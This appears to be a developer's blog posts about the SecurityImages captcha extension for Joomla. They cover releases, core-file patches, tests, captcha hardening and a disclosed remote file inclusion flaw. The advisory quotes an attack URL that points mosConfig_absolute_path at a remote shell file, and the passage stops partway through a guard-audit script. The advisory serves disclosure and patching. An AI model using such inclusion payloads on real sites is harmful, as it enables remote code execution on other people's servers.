jed


  • (image: software_bugs_dilbert)

    Thanks to Margus Pala, a security flaw affecting SecurityImages version 5.1.2 and earlier has been reported and corrected.

    The flaw is of moderate severity: in registration forms, spammers are able to register without solving the captcha!

    • It affects only SecurityImages 5.x for Joomla! 1.5
    • SecurityImages 6.x for Joomla! 1.6 is not affected

    To resolve this issue you do not have to install a new version of SecurityImages; you must either

    • Update your site with the right version of the Joomla! patches; their file names all end with Joomla_1.5.x-Stable-Full_PackageForSecurityImages5.y.z_v01.03.00

    OR

    • Edit the file components\com_user\controller.php and remove line 274, the $this->register() call, from this block:
    if ($useSecurityImagesInRegister && !$this->checkSecurityImagesCaptcha()) {
      JError::raiseWarning('', JText::_('SECURITYIMAGES REJECT USER ENTRY'));
      $this->register(); // line 274: remove this call
      return false;
    }

    These patch versions have the flaw:

    04/12/2008  Joomla_1.5.1-Stable-Full_PackageForSecurityImages5.0.0.zip
    05/01/2008  Joomla_1.5.2-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    05/01/2008  Joomla_1.5.3-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    07/10/2008  Joomla_1.5.4-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    08/03/2008  Joomla_1.5.5-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    08/03/2008  Joomla_1.5.6-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    08/19/2008  Joomla_1.5.6-Stable-Full_PackageForSecurityImages5.1.0_v01.00.00.zip
    09/13/2008  Joomla_1.5.7-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    09/20/2008  Joomla_1.5.7-Stable-Full_PackageForSecurityImages5.1.0_v01.00.00.zip
    11/11/2008  Joomla_1.5.8-Stable-Full_PackageForSecurityImages5.0.0_v01.00.00.zip
    01/19/2009  Joomla_1.5.8-Stable-Full_PackageForSecurityImages5.1.0_v01.01.00.zip
    01/19/2009  Joomla_1.5.9-Stable-Full_PackageForSecurityImages5.1.0_v01.01.00.zip
    03/28/2009  Joomla_1.5.10-Stable-Full_PackageForSecurityImages5.1.0_v01.01.00.zip
    06/03/2009  Joomla_1.5.11-Stable-Full_PackageForSecurityImages5.1.0_v01.01.00.zip
    07/04/2009  Joomla_1.5.12-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip
    07/26/2009  Joomla_1.5.13-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip
    07/26/2009  Joomla_1.5.14-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip
    09/11/2009  Joomla_1.5.14-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    11/09/2009  Joomla_1.5.15-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    04/24/2010  Joomla_1.5.16-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    04/24/2010  Joomla_1.5.17-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    09/12/2010  Joomla_1.5.18-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    04/24/2010  Joomla_1.5.20-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    01/09/2011  Joomla_1.5.21-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    01/09/2011  Joomla_1.5.22-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip
    01/09/2011  Joomla_1.5.23-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip

    You can download the updated versions HERE or search the download section; type 1.5.23 to find the patches for Joomla! 1.5.23, for example.

  • Why update?
    • If you want to use more than one captcha on a page.
    • If you want a captcha on the administrator page.
    • If your old version 3.0.8 or 4.0.1 does not work as expected.
    • If you use any version < 3.0.4, which has a serious injection vulnerability.

    NEW: Captcha can now be used in the administrator login page
    NEW: more settings for switching SecurityImages on/off in the Joomla! core
    BUG: I was starting another PHP session with session_start()

    NEW: Captcha can now be used in the administrator login page


    Note:
    • I changed the file /administrator/templates/joomla_admin/login.php (insertion of the captcha at line 57), meaning that if you use an administrator template other than joomla_admin, you will have to make the same changes in your template
    • I changed the file /administrator/templates/index.php (checking the captcha challenge); this file is independent of the administrator template
    • This mod does not increase the security of the administrator login page; it is smarter to read:
      Todo list for securing your site: http://www.waltercedric.com/content/view/806/102/ and also
      Protecting your Mambo admin panel using htaccess: http://www.waltercedric.com/content/view/706/102/


    NEW: more settings for switching SecurityImages on/off in the Joomla! core
    This lets you deactivate SecurityImages in the core parts of Joomla! more easily.


    Note:
    • Switching these flags to true is not ENOUGH: you also need to install a set of files (an exact copy of the Joomla! files, say of version 1.0.11) that I have modified to support SecurityImages. Right now Joomla! does not allow me to do it differently.

    BUG: I was starting another PHP session with session_start();
    this caused a lot of trouble in the admin login page and revealed that I should rather use:
    session_name( md5( $mosConfig_live_site ) );
    session_start();
    This has the potential to solve an issue in VirtueMart (I have not tested it, but the problem looks similar).

    About the Joomla! core patches I provide to the community
    I do not like hacking Joomla! core files: either the Joomla! team provides a way to extend their core code on the fly (plugins), or I may run into trouble, mainly because I have to provide and maintain patched versions of some core files. It is also risky to do that (the code comes from an untrusted source, even if I am an honest person)...

    In order not to overwrite any changes you have made in the past, all Joomla! users should really try Beyond Compare, from www.scootersoftware.com. It allows you to select 2 directories/zip files/files and, by right-clicking in a Windows Explorer-like interface, compare files and merge them in a 2-way editor (you can copy parts of the code from the left panel to the right). With this tool you can even compare a local directory with a remote one (FTP); this lets you apply releases (the official Joomla! 1.0.11 patch, for example) very easily.

    Joomla! core patches are all located in administrator\components\com_securityimages\patches\*.php, so the influence on the core is minimal. Read them if you want to know how to use SecurityImages in your own code.

    About the release management of my patches:
    • SecurityImages 4.0.1 has a new API and works only with >= JoomlaPatches1.0.11-v1.0.2
    • SecurityImages 3.0.8 has the old API and works only with <= JoomlaPatches1.0.11-v1.0.1
    • SecurityImages 4.1.0 has a new API and works only with JoomlaPatches1.0.11-for securityimages 4.1.0
    My mistake is that I did not document that at all; this is why so many users ran into trouble in the past few weeks...

  • This new release will allow you to set a different captcha per section, as seen in the screenshot below:

    (image: securityimages5.1.2)

    This new release will also focus on making installation easier,

    • by adding supplementary checks in the page "Check Your System"
    • by patching/un-patching Joomla! sections without overwriting any files with FTP (but hey, I will change code on the fly in the background, as there is no better way at the moment)

    I also want to add a new API (the current one will still be available) that will allow me to use reCAPTCHA more easily.

    Ajax would be nice to have in the front end and back end, but that may be out of reach for this release.

    It is time to request new features in the forum! I will look at the requests and they may be part of that release...

    Release expected, in the worst case, at the end of the month.

  • I did not see that I was using a feature only available in PHP5 while coding the class administrator/components/com_securityimages/classSecurityimagesSession.php (a singleton holding database connections).

    This is PHP5-only, and I was looking at how the database connection is done in Joomla! 1.5. I am providing a patch that will allow all of you to run SecurityImages on PHP4 and PHP5: download SecurityImages 4.3.1

    Remember: PHP4 is discontinued.

    As mentioned in this post on PHP.net, the PHP4 life cycle is finally coming to a close:

    Today it is exactly three years ago since PHP 5 has been released. In those three years it has seen many improvements over PHP 4. PHP 5 is fast, stable & production-ready and as PHP 6 is on the way, PHP 4 will be discontinued.

    The PHP development team hereby announces that support for PHP 4 will continue until the end of this year only. After 2007-12-31 there will be no more releases of PHP 4.4. We will continue to make critical security fixes available on a case-by-case basis until 2008-08-08. Please use the rest of this year to make your application suitable to run on PHP 5.

    They also link to a migration guide for users moving up from PHP4 to PHP5, including guides for the PHP 5.0 to 5.1 switch and the PHP 5.1 to 5.2 switch.

    + You can expect 25% more speed just by going to PHP5.

    Visiting www.gophp5.org may also help in your migration.
    Since the launch of GoPHP5.org, over 100 software projects and over 200 web hosts have come on board to support the adoption of PHP 5.2.

  • (image: joomla_cms)

    This is a drop-in replacement for the Joomla! core module "Popular Articles"; it offers the same features but also adds thumbnails.

    • Joomla! 1.5: use mod_articles_popular_thumb_j15.zip
    • Joomla! 1.6 and above: use mod_articles_popular_thumb_j15_j16.zip

    Visit the download section

    Features

    New features are in yellow

    (image: PopularArticleswithThumbnailsforJoomla_03)

    • For Joomla! 1.5/1.6/1.7
    • CSS driven output (file located at media/mod_articles_popular_thumb/css.css); feel free to submit changes or alternate CSS layouts.
    • Uses Joomla! caching for best performance,
    • Thumbnail width and height can be specified,
    • Thumbnails are automatically extracted from the introduction text. If no image is found, a default picture can be defined,
    • You can switch off the title, text teaser and thumbnails separately,
    • The length of the text teaser and its ending (»/…/read more) can be modified in the administrator panel,
    • It is based on the code of the internal Joomla! core module mod_mostread.

    Notes

    This module uses TimThumb 2.8.0, which must be installed as a Joomla! library.

    TimThumb is a simple, flexible, PHP script that resizes images. You give it a bunch of parameters, and it spits out a thumbnail image that you can display on your site.

    Example of output

    With title, text teaser or only with thumbnails. Any combination is possible.

    (images: PopularArticleswithThumbnailsforJoomla_01, PopularArticleswithThumbnailsforJoomla_00, PopularArticleswithThumbnailsforJoomla_02)

  • An insight into SecurityImages 5.2.0, still in development; as usual, all comments are welcome either in this post or in my forum

    NEW: fonts are now auto-detected, and a better widget is now available for selecting them; sorry, still no font preview in PHP ;-)

    (image: font.autodetection)

    You can install your own TrueType fonts in /administrator/components/com_securityimages/fonts
    This replaces the combo box, which was prone to user entry errors...
    (image: not.user.friendly)

    NEW: More fine-grained control over the type of plugin you would like to use on a per section/category basis.
    A small captcha for the login module, and a bigger one or a totally different rendering algorithm in register, for example.

    NEW: A check to prevent users from choosing plugin/version combinations that do not exist.

    (image: check.newPanelControl)

    NEW: A new API for reCAPTCHA / existing sections that makes integration a lot easier. The old API is still available for backward compatibility.

    NEW: Sound! Developed for SecurityImages and also to be committed to the Joomla Comment trunk.

    SecurityImages creates audible CAPTCHA codes as WAV files by combining sound files of each letter and number that appears in the character set.

    • A feature that has taken 3 years to be integrated...
    • It increases the component size by 320kb!
    • It can only speak English at the moment...
    • It cannot speak special characters (#%&)
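    As an added illustration of the mechanism just described (example code written for this page, not SecurityImages' own; the per-character recordings are replaced by synthesized tones so that it runs offline), this script concatenates one WAV fragment per character of the code into a single WAV file:

```php
<?php
// Added example, not SecurityImages' own code: assemble an audible CAPTCHA by
// concatenating one WAV file per character of the code, as the post describes.
// Assumptions: every per-character file is a canonical 44-byte-header PCM WAV
// and all share one sample rate, channel count and bit depth. The per-character
// "recordings" are synthesized tones so the script runs offline.

/** Wrap raw PCM sample data in a canonical RIFF/WAVE header. */
function wavEncode(string $pcm, int $rate, int $channels, int $bits): string
{
    $blockAlign = $channels * intdiv($bits, 8);
    return pack('A4VA4A4VvvVVvvA4V',
        'RIFF', 36 + strlen($pcm), 'WAVE',
        'fmt ', 16, 1, $channels, $rate, $rate * $blockAlign, $blockAlign, $bits,
        'data', strlen($pcm)) . $pcm;
}

/** Parse a canonical PCM WAV into [rate, channels, bits, pcm]; throws otherwise. */
function wavDecode(string $wav): array
{
    if (strlen($wav) < 44 || substr($wav, 0, 4) !== 'RIFF' || substr($wav, 8, 4) !== 'WAVE') {
        throw new InvalidArgumentException('not a RIFF/WAVE file');
    }
    $h = unpack('vformat/vchannels/Vrate/Vbyterate/vblockalign/vbits', substr($wav, 20, 16));
    if ($h['format'] !== 1 || substr($wav, 36, 4) !== 'data') {
        throw new InvalidArgumentException('only canonical PCM WAV is supported');
    }
    $len = unpack('V', substr($wav, 40, 4))[1];
    if (strlen($wav) < 44 + $len) {
        throw new InvalidArgumentException('truncated data chunk');
    }
    return [$h['rate'], $h['channels'], $h['bits'], substr($wav, 44, $len)];
}

/**
 * Concatenate the recordings for each character of $code, with $gapMs of
 * silence between them, and return the combined WAV file contents.
 * $library maps a character to the WAV file contents for that character.
 */
function buildAudioCaptcha(string $code, array $library, int $gapMs = 150): string
{
    $pcm = '';
    $fmt = null;
    foreach (str_split($code) as $ch) {
        if (!isset($library[$ch])) {
            throw new InvalidArgumentException("no recording for character '$ch'");
        }
        [$rate, $channels, $bits, $samples] = wavDecode($library[$ch]);
        $fmt ??= [$rate, $channels, $bits];
        if ($fmt !== [$rate, $channels, $bits]) {
            throw new InvalidArgumentException('all recordings must share one format');
        }
        // 8-bit PCM is unsigned, so silence is 0x80; wider samples are signed, so 0x00.
        $silence = str_repeat($bits === 8 ? "\x80" : "\x00",
            intdiv($rate * $gapMs, 1000) * $channels * intdiv($bits, 8));
        $pcm .= ($pcm === '' ? '' : $silence) . $samples;
    }
    if ($fmt === null) {
        throw new InvalidArgumentException('empty code');
    }
    return wavEncode($pcm, $fmt[0], $fmt[1], $fmt[2]);
}

/** Constructed stand-in for a spoken character: an 8-bit mono 8 kHz tone. */
function tone(float $hz, int $ms = 200, int $rate = 8000): string
{
    $out = '';
    for ($i = 0, $n = intdiv($rate * $ms, 1000); $i < $n; $i++) {
        $out .= chr(128 + (int) round(100 * sin(2 * M_PI * $hz * $i / $rate)));
    }
    return wavEncode($out, $rate, 1, 8);
}

$library = [];
foreach (str_split('abcdefghijklmnopqrstuvwxyz0123456789') as $i => $ch) {
    $library[$ch] = tone(300 + 20 * $i);   // a distinct pitch per character
}
file_put_contents('captcha.wav', buildAudioCaptcha('test123', $library));
```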

    AJAX: start of a POC which allows the captcha to be checked asynchronously without needing to submit the whole page. This has been a major complaint since the beginning of SecurityImages, as currently users lose their entries in the form if the captcha challenge gets refused. I will try to use jQuery/XAJAX

  • (images: com_securityimages, joomla_1.5, open.qa.logo)

    I have done my homework today: in order to ensure release quality and avoid manual testing of SecurityImages at every release, I am releasing Selenium test cases so that anybody/any developer can run them against their homepage.

    Prerequisites

    • Extract this zip file into a new directory (link soon available)
    • Load the test suite (set of tests) named securityimages.testsuite
      (image: seleniumSecurityImages5)
    • Take care with the Base URL: in the test suite I use http://localhost/T1; put the right base, of course, for example http://www.yourhost.com/
      (image: seleniumSecurityImages)
    • The user login/password has to be changed to an existing user!
      (image: seleniumSecurityImages1)
    • SecurityImages has to be put in TEST mode. This is a new setting in the administrator panel. In this mode SecurityImages accepts only the word "test123" as captcha response and nothing else, because I cannot read, or find in the test case, the word hidden in the picture without a lot of effort (switch TEST mode off again when you are done, since in this mode "test123" is accepted from anyone).
    • The test suite works only for HNcaptcha at the moment.
    • You can run all test cases in the suite by clicking the first button (image: seleniumSecurityImages2) or just one or two with the second (image: seleniumSecurityImages3), but in that case don't forget to also always select the test InitializeTestcases.test (use ALT GR)

    (image: seleniumSecurityImages4) Currently only 4 tests are not working, and this is because Selenium cannot submit the contact and register forms of Joomla!; this has nothing to do with my code.

    The next step is to put everything in XINC...


  • (image: joomla_cms)

    This is a drop-in replacement for the Joomla! core module "Related Articles"; it offers the same features but also adds thumbnails.

    This module displays other Articles that are related to the one currently being viewed. These relations are established by the Meta Keywords.
    All the keywords of the current Article are searched against all the keywords of all other published Articles. For example, you may have an Article on "Breeding Parrots" and another on "Hand Raising Black Cockatoos". If you include the keyword "parrot" in both Articles, then the Related Items Module will list the "Breeding Parrots" Article when viewing "Hand Raising Black Cockatoos" and vice-versa.

    You can see this module live running here (module in top right corner)

    Attention: the library "TimThumb for Joomla! 1.6 / 1.7" is required for proper operation.

    Features

    • For Joomla! 1.5/1.6/1.7
    • CSS driven output (file located at media/mod_articles_popular_thumb/css.css); feel free to submit changes or alternate CSS layouts.
    • Uses Joomla! caching for best performance,
    • Thumbnail width and height can be specified,
    • Thumbnails are automatically extracted from the introduction text. If no image is found, a default picture can be defined,
    • You can switch off the title, text teaser and thumbnails separately,
    • The length of the text teaser and its ending (»/…/read more) can be modified in the administrator panel,
    • It is based on the code of the internal Joomla! core module mod_related_items.

    Notes

    This module uses TimThumb 2.8.0, which must be installed as a Joomla! library.

    TimThumb is a simple, flexible, PHP script that resizes images. You give it a bunch of parameters, and it spits out a thumbnail image that you can display on your site.

    Visit the download section

  • (image: joomla_cms)

    This extension plugin displays other Articles that are related to the one currently being viewed. These relations are established by the Meta Keywords.
    All the keywords of the current Article are searched against all the keywords of all other published Articles. For example, you may have an Article on "Breeding Parrots" and another on "Hand Raising Black Cockatoos". If you include the keyword "parrot" in both Articles, then the Related Items Module will list the "Breeding Parrots" Article when viewing "Hand Raising Black Cockatoos" and vice-versa.

    What’s new?

    • Tested against Joomla 1.7.0, 1.7.1 and 1.7.2
    • It uses the latest TimThumb library for more performance and better resizing options,
    • The Joomla! update manager lets you update from 3.0.0 to 3.1.1 in one click
    • Refactoring: 25% less code, more functionality!

    and best of all, new plugin outputs are available!

    Matrix

    Allows you to display a matrix of N thumbnails per line. The post title is visible only when the user hovers over a picture. Use it for blogs with great pictures, when you want to maximize the visual impact and if you are ready to use thumbnails of at least 140 x 140 pixels.

    Related Posts Slide Out Boxes

    Related Posts Sliding Boxes with Shuffle Function using jQuery 1.5 and CSS3.

    All credit goes to the author at http://tympanus.net/codrops/2010/07/21/related-posts-slide-out-boxes/

    New plugins are also coming soon!

    You can see the latest version 3.1.1 running live at demo-joomla-1.7.waltercedric.com in demo mode, and download it here.

    Currently only for Joomla! 1.7; a back port of the functionality to Joomla! 1.5 is underway

  • I know that "Secure, Safe, Fast Linux Hosting" sounds silly, as nothing can be fast and secure at the same time, but I have compiled a list of things that are worth doing if you maintain your own server. This list is clearly targeted at people running an open source stack made of Apache, MySQL, PHP and Linux.

    This list is an ongoing work, which is why it also has a version number (v1.0). As soon as I learn new tricks, the list will be updated.

    By clicking read more, you will be able to go through the checklist, or maybe you will prefer the mindmap version HERE

  • Oops, it seems (!) that protecting forms with security images may not be such a good idea (it may stop a lot of spammers, but not all)... as there are already some open source or closed programs to defeat them... I am convinced that not all spammers will be able or want to attack a site protected with images, especially a user homepage. But if the site is well known (e.g. Yahoo)... read below: frightening!

    PWNtcha stands for "Pretend We’re Not a Turing Computer but a Human Antagonist", as well as PWN capTCHAs. This project’s goal is to demonstrate the inefficiency of many captcha implementations.

    Anyway, this page is giving me enough ideas on how to tune my code to avoid/disallow/make automatic recognition of characters more difficult...

    Among others, from this page:

    • render the characters with different colors -> I will do it, easy
    • make some characters darker than the background, and some lighter
    • use gradient colors for the backgrounds and the characters
    • don't align all the characters vertically -> possible in the current implementation
    • don't make the answers words, as a dictionary could otherwise be used -> already random
    • use more characters and symbols -> done
    • use uppercase and lowercase characters -> already done
    • use a different number of characters each time -> done
    • rotate some of the characters more drastically (i.e. upside down) -> will try
    • do more overlapping of characters
    • add a grid -> done
    • make some pixels of a single character not touching
    • have grid lines that cross over the characters in their same color
    • consider asking natural language questions
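    As an added example of how several items on this list combine in one renderer (code written for this page, not SecurityImages' own; it uses GD's built-in bitmap fonts, so rotation and TrueType fonts are left out):

```php
<?php
// Added example, not SecurityImages' own rendering code: a small GD renderer
// that applies several of the countermeasures listed above: gradient
// background, characters both darker and lighter than the background in
// varying colours, random vertical offsets, a variable number of mixed-case
// characters (never a dictionary word) and grid lines drawn in the characters'
// own colours. GD's built-in bitmap fonts are used, so no TTF file is needed.

/** Random mixed-case alphanumeric code of variable length. */
function randomCode(int $min = 5, int $max = 8): string
{
    // Visually ambiguous glyphs (0/O, 1/l/I) are left out of the alphabet.
    $alphabet = 'ABCDEFGHJKLMNPQRSTUVWXYZabcdefghjkmnpqrstuvwxyz23456789';
    $code = '';
    for ($len = random_int($min, $max); strlen($code) < $len;) {
        $code .= $alphabet[random_int(0, strlen($alphabet) - 1)];
    }
    return $code;
}

/** Render $code as a PNG image and return the PNG bytes. */
function renderCaptcha(string $code, int $w = 200, int $h = 35): string
{
    $img = imagecreatetruecolor($w, $h);

    // Mid-grey horizontal gradient, so that text can be either darker or lighter.
    for ($x = 0; $x < $w; $x++) {
        $g = 90 + intdiv(70 * $x, $w);
        imageline($img, $x, 0, $x, $h - 1, imagecolorallocate($img, $g, $g, $g + 10));
    }

    $font = 5;                                      // largest built-in GD font
    $cw = imagefontwidth($font);
    $chh = imagefontheight($font);
    $slot = intdiv($w - 20, max(1, strlen($code)));  // horizontal room per character
    $colours = [];
    foreach (str_split($code) as $i => $ch) {
        // Even positions get a dark colour, odd positions a light one; each channel
        // is randomised within that band so no two characters look alike.
        $lo = ($i % 2 === 0) ? 0 : 180;
        $c = imagecolorallocate($img, random_int($lo, $lo + 70),
                                      random_int($lo, $lo + 70),
                                      random_int($lo, $lo + 70));
        $colours[] = $c;
        $x = 10 + $i * $slot + random_int(0, max(0, $slot - $cw - 1));
        $y = random_int(0, max(0, $h - $chh));       // vertical jitter
        imagechar($img, $font, $x, $y, $ch, $c);
    }

    // Grid lines that share the colours of the characters they cross, so a
    // colour-based segmentation cannot simply discard them.
    for ($i = 0; $colours !== [] && $i < 6; $i++) {
        $c = $colours[array_rand($colours)];
        imageline($img, random_int(0, $w - 1), 0, random_int(0, $w - 1), $h - 1, $c);
        imageline($img, 0, random_int(0, $h - 1), $w - 1, random_int(0, $h - 1), $c);
    }

    ob_start();
    imagepng($img);
    imagedestroy($img);
    return ob_get_clean();
}

$code = randomCode();
file_put_contents('captcha.png', renderCaptcha($code));
// Keep $code server-side (e.g. in the session) and compare it with the answer
// submitted from the form; never send it to the browser.
```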

    Breaking a Visual CAPTCHA: homepage of the shape-contexts-based approach to break Gimpy, the CAPTCHA test used at Yahoo! to screen out bots. Its authors report that their method can successfully pass that test 92% of the time.

  • I am currently finishing the release of SecurityImages...
    • New backgrounds (more than 24 now); you can help me by submitting random backgrounds (size 200 * 35 pixels).
    • Possibility to edit the language file directly from the back end
    • The reload function all of you are waiting for
    • A better code architecture that will allow adding a new captcha engine with ease (in less than 2 hours)
    • Working with PHP5

    3 testers have received a beta version for testing, and I am waiting for their feedback...

    The wiki has been updated with some screenshots

    I may also include a VeriWord plugin and even a plugin randomizer function soon


  • Com security image will be shipped soon with a patch for Joomla 1.0.3 which also modifies the login and registration process; see screenshots below....

    in the login module:

    in the registration component:

    in the registration component, lost password:

    The more backgrounds and the more fonts, the more difficult it is for a robot to do OCR on the pictures.... I was thinking of automating a search on Google Images and randomizing the background, but Google forbids this kind of misuse of their services (I understand that)

  • I will also release a new version of akocomment, and resolve the logged-in user bugs that many people have reported to me.

    Release 2.2.0 to be released soon

    • All - Security patches: add the missing index.html files and the missing PHP header: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
    • Plugin core is now able to output the image as PNG, JPG or GIF, selectable in the admin core settings
    • Plugin core is now able to limit the reload attempts of users; the retry counter is stored in the user session. If the user reloads the picture more than Retry (tab Text)...
    • Plugin core has a new switch: use extended charset in image, e.g. +*%&/()=?!$?@#... true or false
    • Plugin core is now able to align text in the image using 4 strategies:
      • System font with random character position
      • TTFonts with random character position (the best for me, OCR is more difficult)
      • TTFonts with linear character position (default setting)
      • Random choice among the above 3, in a random order
    • All - Patches for the login/registration Joomla framework as files in /patches/. You have either:
      • To modify the Joomla files manually by following the steps below, OR
      • To copy the already patched files (Joomla 1.0.3) to the server at the right place
    • All - Bug in function getSecurityImageField($textid): the JavaScript was not bootstrapped; no influence, but the bug was revealed when doing the login integration
    • All - General Settings: it is now possible to display the reload or sound button selectively.
    • com_contact: if the user failed to enter the right captcha, he lost his data. This is not a bug but a functionality missing in Joomla -> a form reached with history back is always initialized with empty fields in Mozilla Firefox, while in IE it works
    • Plugin All - Bug: if logs are activated, the PHP code logger.php was not included in the delegate plugins/xx/yy/checker.php
    • All - New tab in "General settings" called "Joomla-Patches"; this lets you switch the use of security images in login and registration on or off.
    • Plugin core - Bug: corrected the contrast of 2 images, bg-L-5.png and bg-L-18.png: they were too dark!
    • All - A new menu entry "Check if latest version" has been added; I only have to finish the server code -> it is not working right now, but soon.


    AkoComment

    Administrator mail UTF8 support patch by Karel Neugebauer jr. - http://itx.cz

    Install the security images form code in existing Joomla code...

    Point A: Open components\com_registration\registration.html.php, line 54, in function registerForm($option, $useractivation), and add the PHP block between the //security image comments:
    <tr>
    <td>
    <?php echo _PROMPT_EMAIL; ?>
    </td>
    <td>
    <input type="text" name="confirmEmail" class="inputbox" size="40" />
    </td>
    </tr>


    <?php
    //security image by www.waltercedric.com
    global $mosConfig_absolute_path;
    if (file_exists($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.lostPassForm.php')) {
    require_once($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.lostPassForm.php');
    }
    //end security image by www.waltercedric.com
    ?>


    <tr>
    <td colspan="2">
    <input type="hidden" name="option" value="<?php echo $option;?>" />
    <input type="hidden" name="task" value="sendNewPass" /> <input type="submit" class="button" value="<?php echo _BUTTON_SEND_PASS; ?>" />
    </td>
    </tr>
    Point B: Open components\com_registration\registration.html.php, line 164, in function registerForm($option, $useractivation), and add the PHP block between the //security image comments:
    <tr>
    <td>
    <?php echo _REGISTER_VPASS; ?> *
    </td>
    <td>
    <input class="inputbox" type="password" name="password2" size="40" value="" />
    </td>
    </tr>

    <?php
    //security image by www.waltercedric.com
    global $mosConfig_absolute_path;
    if (file_exists($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.html.registerForm.php')) {
    require_once($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.html.registerForm.php');
    }
    //end security image by www.waltercedric.com
    ?>

    <tr>
    <td colspan="2">
    </td>
    </tr>
    Point C

    Install the security images checking code in existing Joomla code...

    Point 1: Open \components\com_registration\registration.php and, after line 61, add the block between the //securityimages comments below (it was shown in bold in the original post):
    $checkusername = mosGetParam( $_POST, 'checkusername', '' );
    $checkusername = $database->getEscaped( $checkusername );
    $confirmEmail = mosGetParam( $_POST, 'confirmEmail', '');
    $confirmEmail = $database->getEscaped( $confirmEmail );

    //securityimages by www.waltercedric.com
    global $mosConfig_absolute_path;
    if (file_exists($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.SendNewPass.php')) {
    include_once($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.SendNewPass.php');
    }
    //end security images by www.waltercedric.com


    $query = "SELECT id"
    Point 2: Open \components\com_registration\registration.php and, after line 123 (123 counts the lines added in Point 1), add the block between the //securityimages comments:
    function saveRegistration( $option ) {
    global $database, $acl;
    global $mosConfig_sitename, $mosConfig_live_site, $mosConfig_useractivation, $mosConfig_allowUserRegistration;
    global $mosConfig_mailfrom, $mosConfig_fromname, $mosConfig_mailfrom, $mosConfig_fromname;

    if ($mosConfig_allowUserRegistration=='0') {
    mosNotAuth();
    return;
    }

    //securityimages by www.waltercedric.com
    global $mosConfig_absolute_path;
    if (file_exists($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.SaveRegistration.php')) {
    include_once($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/registration.SaveRegistration.php');
    }
    //end security images by www.waltercedric.com

    $row = new mosUser( $database );

    if (!$row->bind( $_POST, 'usertype' )) {
    echo "<script> alert('".$row->getError()."'); window.history.go(-1); </script>\n";
    exit();
    }
    Point 3: Open includes\joomla.php and, after line 610, add the block between the //securityimages comments:
    $passwd = md5( $passwd );
    $bypost = 1;
    }
    $remember = mosGetParam( $_POST, 'remember', '' );


    //securityimages by www.waltercedric.com
    global $mosConfig_absolute_path;
    if (file_exists($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/joomla.login.php')) {
    include_once($mosConfig_absolute_path.'/administrator/components/com_securityimages/patches/joomla.login.php');
    }
    //end security images by www.waltercedric.com


    if (!$username || !$passwd) {
    echo "<script> alert(\""._LOGIN_INCOMPLETE."\"); window.history.go(-1); </script>\n";
    exit();
    } else {


  • In order to avoid spamming at any cost, I am including security images in Mambo. The component (a part of hashcash) won't be released before the end of the week, even if it is functional, mainly because:

    • I want to integrate this technology in the guestbook (Akobook) -> not done yet
    • I want to integrate this technology in the administrator login page, to avoid brute force attacks -> not done yet
    • I want to have a beautiful back-end panel, because this functionality is highly configurable: -> not done yet
      Example of variables in the code (not all):
      $textLength = 8;
      $useRandomSize = true;
      $textFontSizeDefualt = 14;
      $textFontSizeMin = 12;
      $textFontSizeMax = 18;
      $textFontName = "garamond.ttf";
      $useRandomTextAngle = true;
      $textAngleMin = -5;
      $textAngleMax = 5;
      $cleanupTable = "10 minutes";
    • So what is done? The commenting system of Mambo (the excellent akocomment component) is migrated.... see picture
    • A GNU/GPL release of course ;-) (for my code only; there is a strong copyright on akocomment and akobook)



  • The webmaster of janwiersma.com sent me an email today at 6:12 AM: his server was hacked because of a bug in SecurityImages. This bug allows a remote attacker to execute commands on your server via a remote forceful include and execute function, and affects ALL versions of SecurityImages <= 3.0.5.

    Here are all the files which put your server at risk:
    client.php, configinsert.php, lang.php, server.php

    Example of attack:
    http://web/components/com_securityimages/
    configinsert.php?mosConfig_absolute_path=http://shell.txt
    from http://securityreason.com/exploitalert/892
    Secunia also has a report on it: http://secunia.com/product/11186/
    In fact I forgot to use this line in these files:
    defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
    This prevents any request from accessing the file directly: the _VALID_MOS constant is defined only when a file is loaded through the site's index.php, so a file requested on its own exits before the include that takes its path from a request parameter can run.

    - upgrade to 3.0.6 (download at Joomla Forge or in my download section) OR
    - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)
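    An added check, not part of the original advisory, to find which PHP files in an extension directory still lack the guard (the sample directory and files it creates are constructed for the demonstration):

```php
<?php
// Added example, not part of the SecurityImages advisory: audit a Mambo/Joomla 1.0
// extension directory and list every PHP file that does not start with the
//     defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
// guard, i.e. every file that still executes when requested directly. The
// constant is only defined by the site's index.php, so a file whose first
// statement is this guard exits before any other code runs. The directory and
// file contents below are constructed for the demonstration.

/**
 * True when the first executable statement of $source is the _VALID_MOS guard.
 * The opening tag, whitespace and comments are skipped; anything else executed
 * before the guard (inline HTML, a global, an include) means it is ineffective.
 */
function hasValidMosGuard(string $source): bool
{
    $preamble = [T_OPEN_TAG, T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];
    $statement = '';
    foreach (token_get_all($source) as $token) {
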